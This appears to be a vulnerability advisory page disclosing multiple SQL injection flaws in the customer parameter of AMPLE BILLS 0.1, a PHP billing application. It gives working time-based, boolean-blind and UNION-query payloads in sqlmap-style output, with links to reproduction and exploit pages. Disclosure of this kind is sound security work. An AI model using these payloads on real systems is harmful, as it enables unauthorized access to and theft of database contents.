AMPLE BILLS 0.1 SQL injection

2024.04.15
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: AMPLE BILLS 0.1 Multiple-SQLi ## Author: nu11secur1ty ## Date: 04/13/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The customer parameter (#1*) appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the customer parameter. The application took 20017 milliseconds to respond to the request, compared with 4 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: customer=(-8147) UNION ALL SELECT CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html) ## Time spent: 01:15:00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top